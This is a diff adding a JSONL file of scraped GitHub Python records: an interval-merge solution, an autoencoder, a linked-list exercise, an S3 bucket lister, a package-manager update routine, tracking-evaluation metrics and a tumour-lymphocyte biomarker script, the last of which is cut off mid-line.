diff --git "a/5418.jsonl" "b/5418.jsonl" new file mode 100644--- /dev/null +++ "b/5418.jsonl" @@ -0,0 +1,1416 @@ +{"seq_id":"2071524653","text":"\"\"\"\nGiven a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\nYou may assume that the intervals were initially sorted according to their start times.\n\nInput: intervals = [[1,3],[6,9]], newInterval = [2,5]\nOutput: [[1,5],[6,9]]\n\"\"\"\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n \n s = newInterval.start\n e = newInterval.end\n \n left = [i for i in intervals if i.end < s]\n right = [i for i in intervals if i.start > e]\n \n #this \"if\" statement handles overlapping intervals\n if len(left) + len(right) != len(intervals):\n s = min(s, intervals[len(left)].start)\n e = max(e, intervals[~len(right)].end)\n \n return left + [Interval(s, e)] + right\n","repo_name":"mcfair/Algo","sub_path":"Interval/057. Insert Interval.py","file_name":"057. Insert Interval.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39752503901","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass VAE(nn.Module):\r\n def __init__(self, input_dim, latent_dim):\r\n super(VAE, self).__init__()\r\n self.encoder = nn.Sequential(\r\n nn.Linear(input_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, latent_dim)\r\n )\r\n self.decoder = nn.Sequential(\r\n nn.Linear(latent_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, input_dim),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n z = self.encoder(x)\r\n return self.decoder(z), z\r\n\r\n\r\n","repo_name":"Alexandre-Caldeira/sia_DRL_2023","sub_path":"vae_class.py","file_name":"vae_class.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1019941789","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\n\nclass LinkedList:\n def __init__(self):\n self.a=None\n \n def traverse(self):\n head=self.a\n temp=head\n while temp!=None:\n print(temp.data)\n temp=temp.next\n \n def addToEmpty(self, data):\n\t# Creating the newnode new\n new = Node(data)\n self.a = new\n \n def addBegin(self, data):\n temp = Node(data)\n temp.next = self.a.next\n self.a.next = temp\n return self.a\t\n \n def addEnd(self, data):\n temp = Node(data)\n print(self.a.data)\n temp.next = self.a.next\n self.a.next = temp\n self.a = temp\n # print(self.a.data)\n return self.a\n\n def addAfter(self, data, item):\n temp = Node(data)\n p = self.a.next\n while p:\n if (p.data == item):\n temp.next = p.next\n p.next = temp\n if (p == self.a):\n self.a = temp\n return self.a\n else:\n return self.a\n p = p.next\n if (p == self.a.next):\n print(item, \"not present in the list\")\n break\n \nll=LinkedList()\nll.addToEmpty(3)\nll.addBegin(5)\nll.addEnd(7)\nll.addAfter(9, 5)\nll.traverse()\n","repo_name":"nidhisha-shetty/DSA","sub_path":"LinkedList/circular_linkedlist/circular_llinkedlist_operations.py","file_name":"circular_llinkedlist_operations.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20331814875","text":"import boto3\nimport os\n#from boto3.s3.connection import S3Connection\n\n\n\n\ndef connectWithS3():\n # Create an S3 client\n #s3 = boto3.client('s3', aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n #aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'])\n #s3 = S3Connection(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])\n\n s3 = boto3.client('s3')\n\n # Call S3 to list current buckets\n response = s3.list_buckets()\n\n # Get a list of all bucket names from the response\n buckets = [bucket['Name'] for bucket in response['Buckets']]\n\n # Print out the bucket list\n print(\"Bucket List: %s\" % buckets)\n return \"Bucket List: %s\" % buckets;\n\n","repo_name":"xtheshumanator/ssc-rats","sub_path":"rats/AmazonS3/connectWithS3.py","file_name":"connectWithS3.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9296603657","text":"import json\nfrom json.decoder import JSONDecodeError\n\nimport requests\nfrom Classes.Metadata import Metadata\nfrom Classes.PortablePacket import PortablePacket\nfrom extension import write\nfrom colorama import Fore\nfrom zip_utils import *\nimport os\nimport sys\n\nhome = os.path.expanduser('~')\n\n\ndef update_portable(ctx, packet: PortablePacket, metadata: Metadata):\n import shutil\n import click\n from difflib import get_close_matches\n\n write(\n f'Updating [ {Fore.LIGHTCYAN_EX}{packet.display_name}{Fore.RESET} ]', 'white', metadata)\n\n options = os.listdir(rf'{home}\\electric')\n matches = get_close_matches(\n rf'{home}\\electric\\{packet.json_name}@{packet.latest_version}', options)\n if len(matches) == 1:\n # similar package exists and we need to get the version of the currently installed package.\n current_version = matches[0].split('@')[-1].replace('.json', '')\n\n if current_version != packet.latest_version:\n write(f'{packet.display_name} Will Be Updated From ({current_version}) => ({packet.latest_version})', 'green', metadata)\n write('Requesting Currently Installed Version', 'yellow', metadata)\n\n REQA = 'http://electric-package-manager-api.herokuapp.com/package/'\n\n try:\n response = requests.get(\n REQA + packet.json_name + '.json', timeout=5)\n except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout):\n click.echo(click.style(\n f'Failed to request {packet.json_name}.json from server', 'red'))\n sys.exit()\n\n try:\n res = json.loads(response.text)\n except JSONDecodeError:\n click.echo(click.style(f'{packet.json_name} not found!', 'red'))\n sys.exit()\n\n pkg = res\n\n pkg = pkg['portable']\n\n keys = list(pkg[current_version].keys())\n data = {\n 'display-name': res['display-name'],\n 'package-name': res['package-name'],\n 'latest-version': res['latest-version'],\n 'url': pkg[current_version]['url'],\n 'file-type': pkg[current_version]['file-type'] if 'file-type' in keys else None,\n 'extract-dir': res['package-name'],\n 'chdir': pkg[current_version]['chdir'] if 'chdir' in keys else [],\n 'bin': pkg[current_version]['bin'] if 'bin' in keys else [],\n 'shortcuts': pkg[current_version]['shortcuts'] if 'shortcuts' in keys else [],\n 'pre-install': pkg[current_version]['pre-install'] if 'pre-install' in keys else [],\n 'post-install': pkg[current_version]['post-install'] if 'post-install' in keys else [],\n 'install-notes': pkg[current_version]['install-notes'] if 'install-notes' in keys else None,\n 'uninstall-notes': pkg[current_version]['uninstall-notes'] if 'uninstall-notes' in keys else None,\n 'set-env': pkg[current_version]['set-env'] if 'set-env' in keys else None,\n 'persist': pkg[current_version]['persist'] if 'persist' in keys else None,\n 'checksum': pkg[current_version]['checksum'] if 'checksum' in keys else None,\n 'dependencies': pkg[current_version]['dependencies'] if 'dependencies' in keys else None,\n }\n\n old_packet = PortablePacket(data)\n\n # continue updating the package\n # if a directory has to be saved before uninstallation and installation of the portable\n\n if old_packet.persist:\n install_directory = rf'{home}\\electric\\{old_packet.json_name}@{current_version}\\\\'\n\n if old_packet.chdir:\n install_directory += old_packet.chdir + '\\\\'\n install_directory = install_directory.replace('\\\\\\\\', '\\\\')\n\n if isinstance(old_packet.persist, list):\n for path in old_packet.persist:\n # multiple directories to backup\n try:\n shutil.copytree(\n install_directory + path, rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{path}')\n except FileExistsError:\n pass\n\n else:\n # only 1 directory to backup\n if old_packet.persist:\n try:\n shutil.copytree(install_directory + old_packet.persist,\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{old_packet.persist}')\n except FileExistsError:\n pass\n\n os.system(f'electric uninstall {packet.json_name} --portable')\n os.system(f'electric install {packet.json_name} --portable')\n\n new_install_dir = rf'{home}\\electric\\{packet.json_name}@{packet.latest_version}\\\\'\n if packet.chdir:\n new_install_dir += packet.chdir + '\\\\'\n\n new_install_dir = new_install_dir.replace('\\\\\\\\', '\\\\')\n\n if old_packet.persist:\n write('Restoring Old Files And Data', 'green', metadata)\n\n if isinstance(old_packet.persist, list):\n for path in old_packet.persist:\n shutil.rmtree(new_install_dir + path)\n shutil.copytree(\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{path}', new_install_dir + path)\n else:\n shutil.rmtree(new_install_dir.replace(\n '\\\\\\\\', '\\\\') + old_packet.persist.replace('\\\\\\\\', '\\\\'))\n shutil.copytree(\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{old_packet.persist}', new_install_dir + old_packet.persist)\n\n # completed backup of files to backups directory\n write(\n rf'Successfully Completed Backup Of Required Data To {home}\\electric\\Persist', 'cyan', metadata)\n\n else:\n write(\n f'Could not find any existing installations of {packet.display_name}', 'red', metadata)\n\n write(f'Successfully Updated {packet.display_name}',\n 'bright_magenta', metadata)\n sys.exit()\n","repo_name":"dimensionhq/electric","sub_path":"src/zip_update.py","file_name":"zip_update.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"53"} +{"seq_id":"12194139805","text":"\nimport numpy as np\nfrom eval_code.Eval.eval_utils import squarify, linear_assignment_problem\n#from lapjv import lapjv as hungarian\nfrom scipy.optimize import linear_sum_assignment\n\ndef hungarian(costs):\n r, c = linear_sum_assignment(costs)\n return c, r, []\ndef eval_sequence(gt_data, tracker_data, similarity_scores, alpha_range, meta_data, metrics):\n\n # Init accumulators for sequence\n acc = {}\n\n if 'CLEAR' in metrics:\n acc = eval_CLEAR(acc, gt_data, tracker_data, similarity_scores, alpha_range, meta_data)\n\n if 'HOTA' in metrics or 'ID' in metrics:\n # Calculate gtID/prID alignement over all timesteps\n global_alignment = calc_global_alignment(gt_data, tracker_data, similarity_scores, alpha_range, meta_data)\n if 'HOTA' in metrics:\n acc = eval_HOTA(acc, gt_data, tracker_data, similarity_scores, global_alignment, alpha_range)\n if 'ID' in metrics:\n acc = eval_ID(acc, global_alignment, alpha_range, meta_data)\n\n return acc\n\ndef calc_global_alignment(gt_data, tracker_data, similarity_scores, alpha_range, meta_data):\n\n # Output dict with variables to save\n var_names = ['potential_matches_count','gt_id_count','pr_id_count']\n global_alignment = {k: [] for k in var_names}\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n\n potential_matches_count = np.zeros((meta_data['num_gtIDs'], meta_data['num_trackIDs']))\n gt_id_count = np.zeros((meta_data['num_gtIDs']))\n pr_id_count = np.zeros((meta_data['num_trackIDs']))\n\n # Loop over all timesteps,\n # count the number of potential matches for each gtID/prID combo,\n # and the total number of dets for each gtID and prID\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n gt_ids = time_gt[1].astype(int)\n curr_ids = time_data[1].astype(int)\n\n gt_ids_mat = np.repeat(gt_ids[:, np.newaxis], len(curr_ids), axis=1)\n curr_ids_mat = np.repeat(curr_ids[np.newaxis, :], len(gt_ids), axis=0)\n matches_mask = np.greater(similarity_scores[t], alpha)\n potential_matches_count[gt_ids_mat[matches_mask],curr_ids_mat[matches_mask]] += 1\n\n gt_id_count[gt_ids] += 1\n pr_id_count[curr_ids] += 1\n\n global_alignment['potential_matches_count'].append(potential_matches_count)\n global_alignment['gt_id_count'].append(gt_id_count)\n global_alignment['pr_id_count'].append(pr_id_count)\n return global_alignment\n\ndef eval_HOTA(acc, gt_data, tracker_data, similarity_scores, global_alignment, alpha_range):\n\n # Add HOTA variables to accumulator\n acc_names = ['HOTA_TP','HOTA_FN','HOTA_FP','AssA','AssRe','AssPr','LocA']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)),dtype=np.float)\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n\n # Calculate the global alignment score (Jaccard Index) between each gtID/prID.\n potential_matches_count = global_alignment['potential_matches_count'][a_id]\n gt_id_count = global_alignment['gt_id_count'][a_id][:,np.newaxis]\n pr_id_count = global_alignment['pr_id_count'][a_id][np.newaxis,:]\n global_alignment_score = potential_matches_count / (gt_id_count + pr_id_count - potential_matches_count)\n\n matches_count = np.zeros_like(potential_matches_count)\n\n # Loop over each timestep\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n similarity = squarify(similarity_scores[t], 0)\n gt_ids = time_gt[1].astype(int)\n pred_ids = time_data[1].astype(int)\n\n # Deal with the case that there are no gtDet/prDet in a timestep.\n if len(gt_ids)==0:\n acc['HOTA_FP'][a_id] += len(pred_ids)\n matches_count[-1, pred_ids] += 1\n continue\n if len(pred_ids)==0:\n acc['HOTA_FN'][a_id] += len(gt_ids)\n matches_count[gt_ids, -1] += 1\n continue\n\n # Get matching score pair of Dets for optimizing HOTA\n score_mat = global_alignment_score[gt_ids[:, np.newaxis],pred_ids[np.newaxis, :]]\n score_mat = squarify(score_mat, 0)\n score_mat = score_mat.astype(np.float) + 1.0e4 + 1.0e-4 * similarity\n score_mat[np.less(similarity, alpha)] = -1.0e4\n\n # Hungarian algorithm to find best matches\n match_rows, match_cols = linear_assignment_problem(score_mat)\n\n # Calculate and accumulate basic statistics\n num_matches = len(match_rows)\n acc['HOTA_TP'][a_id] += num_matches\n acc['HOTA_FN'][a_id] += len(gt_ids) - num_matches\n acc['HOTA_FP'][a_id] += len(pred_ids) - num_matches\n acc['LocA'][a_id] += sum(similarity[match_rows, match_cols])\n matches_count[gt_ids[match_rows], pred_ids[match_cols]] += 1\n\n # Calculate association scores for sequence.\n acc['AssA'][a_id] = np.sum(matches_count * matches_count / (gt_id_count + pr_id_count - matches_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n acc['AssRe'][a_id] = np.sum(matches_count * matches_count / np.maximum(1.0, gt_id_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n acc['AssPr'][a_id] = np.sum(matches_count * matches_count / np.maximum(1.0, pr_id_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n\n # Calculate final scores\n acc['LocA'] = acc['LocA'] / np.maximum(1.0, acc['HOTA_TP'])\n acc['DetRe'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FN'])\n acc['DetPr'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FP'])\n acc['DetA'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FN'] + acc['HOTA_FP'])\n acc['HOTA'] = np.sqrt(acc['DetA'] * acc['AssA'])\n return acc\n\ndef eval_CLEAR(acc, gt_data, tracker_data, similarity_scores, alpha_range, meta_data):\n num_gt_ids = meta_data['num_gtIDs']\n\n # Add CLEAR variables to accumulator\n acc_names = ['CLR_TP','CLR_FN','CLR_FP','IDSW','MOTP','MT','PT','ML','Frag']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)), dtype=np.float)\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n gt_id_count = np.zeros((num_gt_ids)) # For MT/ML/PT\n gt_matched_count = np.zeros((num_gt_ids)) # For MT/ML/PT\n gt_frag_count = np.zeros((num_gt_ids)) # For counting Frag\n PrevPrID = np.NaN*np.zeros((num_gt_ids)) # For scoring IDS (previous prID for each gt over all prev timesteps)\n PrevPrID_only_prev = np.NaN * np.zeros((num_gt_ids)) # For matching IDS (previous prID for each gt over only last timestep)\n\n # Loop over timesteps\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n similarity = squarify(similarity_scores[t], 0)\n gt_ids = time_gt[1].astype(int)\n pred_ids = time_data[1].astype(int)\n\n # Deal with the case that there are no gtDet/prDet in a timestep.\n if len(gt_ids)==0:\n acc['CLR_FP'][a_id] += len(pred_ids)\n continue\n if len(pred_ids)==0:\n acc['CLR_FN'][a_id] += len(gt_ids)\n continue\n\n # Calc score matrix to first minimise IDSWs from previous frame, and then maximise MOTP secondarily\n score_mat = (pred_ids[np.newaxis, :] == PrevPrID_only_prev[gt_ids[:, np.newaxis]])\n score_mat = squarify(score_mat, 0)\n score_mat = 1000*score_mat + similarity\n score_mat[similarity < alpha] = -1\n\n # Hungarian algorithm\n match_rows, match_cols = linear_assignment_problem(score_mat)\n matched_gt_ids = gt_ids[match_rows]\n matched_pred_ids = pred_ids[match_cols]\n\n # Calc IDSW for MOTA\n prev_matched_pred_ids = PrevPrID[matched_gt_ids]\n is_IDSW = (np.logical_not(np.isnan(prev_matched_pred_ids))) & (np.not_equal(matched_pred_ids, prev_matched_pred_ids))\n acc['IDSW'][a_id] += np.sum(is_IDSW)\n\n # Update counters for MT/ML/PT/Frag and record for IDS/Frag for next timestep\n gt_id_count[gt_ids] += 1\n gt_matched_count[matched_gt_ids] += 1\n not_previously_tracked = np.isnan(PrevPrID_only_prev)\n PrevPrID[matched_gt_ids] = matched_pred_ids\n PrevPrID_only_prev[:] = np.nan\n PrevPrID_only_prev[matched_gt_ids] = matched_pred_ids\n currently_tracked = np.logical_not(np.isnan(PrevPrID_only_prev))\n gt_frag_count += np.logical_and(not_previously_tracked, currently_tracked)\n\n # Calculate and accumulate basic statistics\n num_matches = len(matched_gt_ids)\n acc['CLR_TP'][a_id] += num_matches\n acc['CLR_FN'][a_id] += len(time_gt[0]) - num_matches\n acc['CLR_FP'][a_id] += len(time_data[0]) - num_matches\n acc['MOTP'][a_id] += sum(similarity[match_rows, match_cols])\n\n # Calculate MT/ML/PT/Frag\n tracked_ratio = gt_matched_count[gt_id_count>0]/gt_id_count[gt_id_count>0]\n acc['MT'][a_id] = np.sum(np.greater(tracked_ratio,0.8))\n acc['ML'][a_id] = np.sum(np.less(tracked_ratio, 0.2))\n acc['PT'][a_id] = sum(gt_id_count>0) - acc['MT'][a_id] - acc['ML'][a_id]\n acc['Frag'][a_id] = np.sum(np.subtract(gt_frag_count[gt_frag_count>0],1))\n\n # Calc final metrics\n acc['MODA'] = (acc['CLR_TP'] - acc['CLR_FP']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['MOTA'] = (acc['CLR_TP'] - acc['CLR_FP'] - acc['IDSW']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['Recall'] = (acc['CLR_TP']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['Precision'] = (acc['CLR_TP']) / (acc['CLR_TP'] + acc['CLR_FP'])\n acc['MOTP'] = acc['MOTP'] / np.maximum(1.0, acc['CLR_TP'])\n return acc\n\ndef eval_ID(acc, global_alignment, alpha_range, meta_data):\n num_gt_ids = meta_data['num_gtIDs']\n num_tracker_ids = meta_data['num_trackIDs']\n\n # Add ID variables to accumulator\n acc_names = ['IDTP', 'IDFP', 'IDFN']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)), dtype=np.float)\n\n # Loop over alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n potential_matches_count = global_alignment['potential_matches_count'][a_id]\n gt_id_count = global_alignment['gt_id_count'][a_id]\n pr_id_count = global_alignment['pr_id_count'][a_id]\n\n # Calculate optimal assignment cost matrix for ID\n FPmat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n FNmat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n FPmat[num_gt_ids:, :num_tracker_ids] = 1e10\n FNmat[:num_gt_ids, num_tracker_ids:] = 1e10\n for gt_id in range(num_gt_ids):\n FNmat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n FNmat[gt_id, num_tracker_ids + gt_id] = gt_id_count[gt_id]\n for pr_id in range(num_tracker_ids):\n FPmat[:num_gt_ids, pr_id] = pr_id_count[pr_id]\n FPmat[pr_id + num_gt_ids, pr_id] = pr_id_count[pr_id]\n FPmat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n FNmat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n\n # Hungarian algorithm\n match_cols, _, _ = hungarian(FPmat + FNmat)\n match_rows = np.arange(len(match_cols))\n\n # Accumulate basic statistics\n acc['IDFP'][a_id] = FPmat[match_rows, match_cols].sum().astype(np.int)\n acc['IDFN'][a_id] = FNmat[match_rows, match_cols].sum().astype(np.int)\n acc['IDTP'][a_id] = (gt_id_count.sum() - acc['IDFN'][a_id]).astype(np.int)\n\n # Calculate final ID scores\n acc['IDP'] = acc['IDTP'] / (acc['IDTP'] + acc['IDFP'])\n acc['IDR'] = acc['IDTP'] / (acc['IDTP'] + acc['IDFN'])\n acc['IDF1'] = acc['IDTP'] / (acc['IDTP'] + 0.5 * acc['IDFN'] + 0.5 * acc['IDFP'])\n return acc\n\n","repo_name":"TimoK93/ApLift","sub_path":"third_party_code/HOTA-metrics_cloned/eval_code/Eval/eval_sequence.py","file_name":"eval_sequence.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"7122911456","text":"import os\nimport argparse\nimport shapely\nimport json\nimport time\nimport joblib\nimport numpy as np\n\nfrom tqdm.auto import tqdm\nfrom functools import partial\n\nfrom sklearn.neighbors import KDTree\n\nfrom multiprocessing.pool import ThreadPool\n\nfrom lib.biomarker.utils import (\n load_data,\n convert_time,\n get_logger,\n check_processed,\n make_dir_result,\n)\nfrom lib.biomarker.digital_tils import (\n get_cluster_region,\n get_radius,\n check_contain,\n clean_feature,\n clustering_spatial,\n get_centroid_contour,\n get_poly_contour,\n check_poly_valid,\n)\n\n\ndef main(\n fpath,\n concave,\n use_hovernet,\n n_worker,\n outer_buffer,\n tum_distance,\n tum_samples,\n logger,\n nuclei_type_1=1, # nuclei to be clustered/tumour\n nuclei_type_2=2, # nuclei to counted/lymphocyte\n):\n first_start = time.time()\n\n fname = fpath.split(\"/\")[-1].split(\".\")[0]\n logger.info(\n f\"distance: {tum_distance} samples: {tum_samples} buffer: {outer_buffer}\"\n )\n logger.info(f\"Processing {fname}\")\n\n #################################################################\n\n start = time.time()\n\n logger.info(\"Opening data...\")\n nuclei_data = load_data(fpath)\n\n logger.info(f\"Data loaded in :{convert_time(time.time() - start)}\")\n\n #################################################################\n\n logger.info(\" preparing data...\")\n if use_hovernet:\n # 1 is tumour\n # 2 is lymphocyte\n key_tum, key_lym, centroids_tum, centroids_lym = get_centroid_contour(\n nuclei_data=nuclei_data, tumour_label=nuclei_type_1, lym_label=nuclei_type_2\n )\n else:\n key_tum, key_lym, centroids_tum, centroids_lym = get_centroid_contour(\n nuclei_data=nuclei_data\n )\n kdtree_lym = KDTree(centroids_lym)\n kdtree_tum = KDTree(centroids_tum)\n\n #################################################################\n\n logger.info(\" clustering...\")\n clusters_centroids = clustering_spatial(\n centroids=centroids_tum,\n key_tum=key_tum,\n nuclei_data=nuclei_data,\n distance=tum_distance,\n min_sample=tum_samples,\n )\n\n #################################################################\n\n result_dict = {\n \"num_tumour_cells\": len(centroids_tum),\n \"num_lymphocyte_cells\": len(centroids_lym),\n \"tumour_cluster\": {},\n }\n\n #################################################################\n\n logger.info(f\" starting get cluster region...\")\n start = time.time()\n part_cluster_region = partial(get_cluster_region, concave)\n with ThreadPool(processes=n_worker) as p:\n cluster_polygons = p.map(part_cluster_region, clusters_centroids)\n\n if concave:\n cluster_concaves = []\n for poly in cluster_polygons:\n if type(poly) == shapely.geometry.multipolygon.MultiPolygon:\n # multi_poly = list(poly.geoms)\n for poly2 in poly.geoms:\n if check_poly_valid(poly2, outer_buffer):\n cluster_concaves.append(poly2)\n else:\n if check_poly_valid(poly, outer_buffer):\n cluster_concaves.append(poly)\n else:\n cluster_concaves = cluster_polygons\n\n dct_visual = {}\n for i, pol in enumerate(cluster_concaves):\n dct_visual[i] = {\n \"inner_contours\": np.around(np.array(pol.exterior.coords.xy), 4).T.tolist(),\n \"outer_contours\": None,\n \"inner_TIL_contour\": None,\n \"outer_TIL_contour\": None,\n \"inner_tum_contour\": None,\n \"outer_tum_contour\": None,\n }\n # logger.info(f\" found {len(cluster_concaves)} concave objects\")\n logger.info(f\" finished get cluster region: {convert_time(time.time() - start)}s\")\n #################################################################\n\n logger.info(\" starting biomarker calculation..\")\n start = time.time()\n for ix, cluster_tum_hull in enumerate(\n tqdm(cluster_concaves, bar_format=\"{l_bar}{bar:10}{r_bar}{bar:-10b}\")\n ):\n #################################################################\n\n outer_cluster_tum_hull_ = cluster_tum_hull.buffer(outer_buffer) # expanded area\n outer_cluster_tum_hull = (\n outer_cluster_tum_hull_ - cluster_tum_hull\n ) # expanded area - original area\n part_check = partial(check_contain, cluster_tum_hull, outer_cluster_tum_hull)\n\n #################################################################\n\n # if (len(outer_cluster_tum_hull.bounds) == 4) and (not outer_cluster_tum_hull.is_empty):\n c_x, c_y, radius = get_radius(outer_cluster_tum_hull_)\n outer_contours = get_poly_contour(outer_cluster_tum_hull_)\n #################################################################\n\n list_nearest_lymphocyte = kdtree_lym.query_radius([[c_x, c_y]], r=radius)\n nearest_lym = list_nearest_lymphocyte[0].tolist()\n\n nearest_lym_centroid = []\n nearest_lym_contour = []\n for x in key_lym[nearest_lym]:\n nearest_lym_centroid.append(nuclei_data[x][\"centroid\"])\n nearest_lym_contour.append(nuclei_data[x][\"contour\"])\n\n #################################################################\n\n list_nearest_tumour = kdtree_tum.query_radius([[c_x, c_y]], r=radius)\n nearest_tum = list_nearest_tumour[0].tolist()\n\n nearest_tum_centroid = []\n nearest_tum_contour = []\n for x in key_tum[nearest_tum]:\n nearest_tum_centroid.append(nuclei_data[x][\"centroid\"])\n nearest_tum_contour.append(nuclei_data[x][\"contour\"])\n\n #################################################################\n\n with ThreadPool(processes=n_worker) as p:\n temp_til = p.starmap(\n part_check, zip(nearest_lym_centroid, nearest_lym_contour)\n )\n\n with ThreadPool(processes=n_worker) as p:\n temp_tum = p.starmap(\n part_check, zip(nearest_tum_centroid, nearest_tum_contour)\n )\n\n #################################################################\n\n (\n inner_count,\n outer_count,\n stat_inner_features,\n stat_outer_features,\n inner_TIL_contour,\n outer_TIL_contour,\n ) = clean_feature(temp_til)\n (\n inner_countTum,\n outer_countTum,\n stat_inner_featuresTum,\n stat_outer_featuresTum,\n inner_tum_contour,\n outer_tum_contour,\n ) = clean_feature(temp_tum)\n result_dict[\"tumour_cluster\"][ix] = {\n \"inner_tumour_area\": cluster_tum_hull.area,\n \"outer_tumour_area\": outer_cluster_tum_hull.area,\n \"num_inner_til\": inner_count,\n \"num_outer_til\": outer_count,\n \"feature_inner_til\": stat_inner_features,\n \"feature_outer_til\": stat_outer_features,\n \"num_inner_tum\": inner_countTum,\n \"num_outer_tum\": outer_countTum,\n \"feature_inner_tum\": stat_inner_featuresTum,\n \"feature_outer_tum\": stat_outer_featuresTum,\n }\n\n dct_visual[ix][\"outer_contours\"] = outer_contours\n dct_visual[ix][\"inner_TIL_contour\"] = inner_TIL_contour\n dct_visual[ix][\"outer_TIL_contour\"] = outer_TIL_contour\n dct_visual[ix][\"inner_tum_contour\"] = inner_tum_contour\n dct_visual[ix][\"outer_tum_contour\"] = outer_tum_contour\n\n #################################################################\n\n #################################################################\n logger.info(f\" finished calculating: {convert_time(time.time() - start)}s\")\n logger.info(f\"{fname} is finished in :{convert_time(time.time() - first_start)}\")\n logger.info(f\"\\n\\n\")\n\n return result_dict, dct_visual\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\", \"--input_dir\", help=\"Directory to nuclei annotation from HoverNet\"\n )\n parser.add_argument(\"-o\", \"--output_dir\", help=\"Directory to save the results\")\n parser.add_argument(\n \"-cc\",\n \"--use_concave\",\n action=\"store_true\",\n help=\"Create concave cluster or not. If false, cluster is convex (faster)\",\n )\n parser.add_argument(\n \"-nd\",\n \"--nuclei_dist\",\n default=100,\n help=\"Minimum distance between nuclei, clustering hyperparameter.\",\n )\n parser.add_argument(\n \"-nn\",\n \"--num_nuclei\",\n default=10,\n help=\"Minimum number of nuclei in cluster, clustering hyperparameter.\",\n )\n parser.add_argument(\n \"-ob\", \"--outer_buffer\", default=60, help=\"Size of the enlarged cluster area\"\n )\n parser.add_argument(\n \"-nw\", \"--num_worker\", default=4, help=\"CPU count for multiprocessing\"\n )\n parser.add_argument(\n \"-hv\",\n \"--use_hovernet\",\n action=\"store_true\",\n help=\"Whether use json from HoverNet or not\",\n )\n\n args = parser.parse_args()\n\n nuclei_dir = args.input_dir\n outdir = args.output_dir\n nuclei_dist = int(args.nuclei_dist)\n num_nuclei = int(args.num_nuclei)\n outer_buffer = int(args.outer_buffer)\n n_worker = int(args.num_worker)\n use_hovernet = args.use_hovernet\n use_concave = args.use_concave\n\n rootdir, fdir, vdir = make_dir_result(\n use_concave, outdir, outer_buffer, nuclei_dist, num_nuclei\n )\n log_file = f\"{rootdir}/tum_dist[{nuclei_dist}]-tum_smpl[{num_nuclei}]_buffer[{outer_buffer}].log\"\n logger = get_logger(logger_name=\"my_log\", log_file=log_file)\n\n file_list, total_len, total_done = check_processed(nuclei_dir, fdir)\n file_list = sorted(file_list, key=os.path.getsize)\n\n for i, fpath in enumerate(file_list):\n print(f\"COUNTER: {i+1+total_done}/{total_len}\")\n fname = fpath.split(\"/\")[-1].split(\".\")[0]\n result, dct_visual = main(\n fpath=fpath,\n concave=True,\n use_hovernet=use_hovernet,\n n_worker=n_worker,\n outer_buffer=outer_buffer,\n tum_distance=nuclei_dist,\n tum_samples=num_nuclei,\n logger=logger,\n )\n out_featureF = f\"{fdir}/{fname}.json\"\n with open(out_featureF, \"w\") as f:\n json.dump(result, f, indent=6)\n\n out_visualF = f\"{vdir}/{fname}.dat\"\n with open(out_visualF, \"wb\") as f:\n joblib.dump(dct_visual, f)\n\n print(\"ALL FILE HAVE BEEN 